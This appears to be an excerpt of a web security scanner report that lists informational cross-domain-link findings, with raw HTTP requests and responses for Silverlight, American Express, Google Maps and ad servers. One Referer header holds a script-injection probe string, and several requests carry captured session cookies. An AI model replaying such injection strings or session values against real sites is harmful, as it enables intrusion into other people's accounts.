HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rlwrjg55xxwy2q550nhjpsb2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://forums.silverlight.net/user/profile.aspx?UserID=60099; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:09:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:59:09 GMT
Content-Length: 13302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660750&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fuser%2Fprofile.aspx%3FUserID%3D60099&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660750&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fuser%2Fprofile.aspx%3FUserID%3D60099&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660750&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fuser%2Fprofile.aspx%3FUserID%3D60099&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

23.479. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http://forums.silverlight.net/forums/AddPost.aspx?ForumID=13 HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: http://forums.silverlight.net/forums/13.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/forums/13.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/forums/AddPost.aspx%25253FForumID%25253D13%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=trjiytjgasykbz45altyakuo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://forums.silverlight.net/forums/AddPost.aspx?ForumID=13; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:12:07 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:02:06 GMT
Content-Length: 13302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660927&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fforums%2FAddPost.aspx%3FForumID%3D13&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660927&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fforums%2FAddPost.aspx%3FForumID%3D13&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660927&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fforums.silverlight.net%2Fforums%2FAddPost.aspx%3FForumID%3D13&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

23.480. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fkagjzuszeopmbf34exlkeap; forums.ReturnUrl=http://www.silverlight.net/default.aspx; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:39 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:39 GMT
Content-Length: 15083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303660419&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

23.481. http://maps.google.co.in/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.co.in
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?oe=utf-8&client=firefox-a&ie=UTF8&q=701+Concord+Ave+Cambridge,+MA+02138&fb=1&gl=in&hnear=&cid=0,0,5277742105129806573&ei=Alb_S-73KMeyrAePyonKDg&ved=0CBYQnwIwAA&hq=701+Concord+Ave+Cambridge,+MA+02138&source=embed&ll=42.408249,-71.147118&spn=0.126748,0.256462&z=12&iwloc=A&output=embed HTTP/1.1
Host: maps.google.co.in
Proxy-Connection: keep-alive
Referer: http://echomail.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1fb5bd1c5e16dcbd:TM=1303695022:LM=1303695022:S=5XtueIRbOYQ5BPsM; expires=Wed, 24-Apr-2013 01:30:22 GMT; path=/; domain=.google.co.in
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 137621

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="View maps and find local b
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="dir-tm" style="visibility:" id="travel_modes_div"> <img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="rs60TaHgFp78zQSS-sSbAg" ved=0CAwQ_gswAA id="marker_A_2"><img alt="A" src="http://maps.gstatic.com/intl/en_in/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...
<span> <img class="unstarred noprint si_5277742105129806573" jsaction="si.togglePanelStarring" jsprops="markerid:'A';b_s:2" data-authtoken="25816db:9yE_U0FsgalFrJFycj1wQGmnayU" src="http://maps.gstatic.com/intl/en_in/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...

23.482. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps/stk/lc?client=ca-pub-8011115638404408&lc_format=map_inset_ad&ll=32.78362%2C-96.818204&spn=0.021792%2C0.025921&z=14&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1303692318%2Cchannel%3A0585047829%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A10.2.154%2Curl%3Ahttp%3A%2F%2Fwww.hellonetwork.com%2Fypsearch.cfm%3Fkw%3Dcredit%2520monitoring%26KID%3D29264%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1303674318536%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1303674311253%2Cdblk%3A1%2Cfrm%3A0%2Cadk%3A1209778470%2Cga_vid%3A1282500417.1303674311%2Cga_sid%3A1303674311%2Cga_hid%3A383501533%2Cga_fc%3A1%2Cga_wpids%3AUA-350746-16%2Cu_tz%3A-300%2Cu_his%3A1%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A9%2Cu_nmime%3A44%2Cbiw%3A1018%2Cbih%3A907%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:03:56 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
onitoring%2526KID%253D29264%26hl%3Den%26client%3Dca-pub-8011115638404408%26adU%3Dwww.mtolympuspark.com%26adT%3DTheme%2BPark%2BHotels%26gl%3DUS&amp;usg=AFQjCNExCmrR23Omd_4yi6IWn1bzEgT3Cg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110414/r20110415/measurements.js"></script>
...[SNIP]...

23.483. https://online.americanexpress.com/myca/logon/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_myacct_acctsum HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; sroute=621677066.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:50:14 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Sun, 24 Apr 2011 20:50:14 GMT
LastModified: Sun, 24 Apr 2011 20:50:14 GMT
Keep-Alive: timeout=15, max=12
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=353241610.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 65295


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="_http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...
<li>
<a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a>
...[SNIP]...
<li>
<a title="" href="https://www.americanexpressfhr.com/ssl/travel/gateway.rvlx?inav=menu_travel_fhr&action_route=1:HOTEL:0:START::SWF#main=1" id="menu_travel_fhr&amp;action_route=1:HOTEL:0:START::SWF#main=1">Fine Hotels &amp; Resorts</a>
...[SNIP]...
<li>
<a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a>
...[SNIP]...
,'moreOptions_BusiOnFocus','colorDropDownText');" onmouseout="javascript:changeMoreOptionsBgrdOut('moreOptions_OF','moreOptions_OFText','moreOptions_BusiOffFocus','colorDropDownText');">
                                                       <a href="https://www.openforum.com/?cid=inav_home&source=login_bus_openforum" title="" id="moreOptions_OFText" class="colorDropDownText">OPEN Forum</a>
...[SNIP]...
assOnFocus','colorDropDownTextOnFocus');" onmouseout="javascript:changeMoreOptionsBgrdOut('moreOptions_AP','moreOptions_APText','BussAppClassOffFocus','colorDropDownText');">                                                
                                                       <a href="https://us.paysimple.com/signon?ReturnUrl=/acceptpay&source=login_busapps_acceptpay" title="" id="moreOptions_APText" class="colorDropDownText" >AcceptPay</a>
...[SNIP]...
','BussAppClassOnFocus','colorDropDownTextOnFocus');" onmouseout="javascript:changeMoreOptionsBgrdOut('moreOptions_IE','moreOptions_IEText','BussAppClassOffFocus','colorDropDownText');">
                                                       <a href="https://www.insuranceedge.com/?utm_source=AMEX&utm_medium=vanity&utm_campaign=appcenter&source=login_busapps_insuranceedge" title="" id="moreOptions_IEText" class="colorDropDownText" >Insurance Edge</a>
...[SNIP]...
BText','prePaidClassOnFocus','colorDropDownText');" onmouseout="javascript:changeMoreOptionsBgrdOut('moreOptions_GCB','moreOptions_GCBText','prePaidClassOffFocus','colorDropDownText');">
                                                       <a href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&source=login_prepaid_giftcardbal" id="moreOptions_GCBText" title="" class="colorDropDownText" >Gift Card Balance</a>
...[SNIP]...

23.484. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<!--added for click to call-->

   
    <script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...

23.485. https://psr.infusionsoft.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.jsp?msg=Whoa%2C+easy+there+tiger.+You%27re+gonna+need+to+login+before+you+can+view+this+page. HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp?pageName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:29 GMT
Content-Length: 11866


<html>
<head>
<!-- This TAG MUST COME FIRST, or else IE will ignore it -->
<meta http-equiv="X-UA-Compatible" c
...[SNIP]...
</script>
<link rel="stylesheet" href="https://infusionmedia.s3.amazonaws.com/app/login-screen/holiday.css" type="text/css" media="screen" />
<meta name="google-site-verification" content="" />
...[SNIP]...

23.486. http://pub.retailer-amazon.net/banner_120_600_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_b.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /banner_120_600_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 655


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
<meta http-equiv="refresh" content="15; URL=banner_120_600_b.php
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.487. http://pub.retailer-amazon.net/banner_728_90_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_b.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /banner_728_90_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 662


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
</head>


<body topmargin="0" leftmargin="0" rightmargin="0" bo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.488. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CMS3TB&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
